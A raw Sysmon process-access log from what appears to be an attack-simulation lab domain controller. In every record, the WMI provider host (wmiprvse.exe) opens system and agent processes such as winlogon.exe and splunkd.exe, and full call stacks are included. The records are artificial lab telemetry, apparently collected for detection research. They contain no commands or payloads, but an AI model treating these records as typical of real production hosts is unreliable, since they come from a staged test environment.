16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.967{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 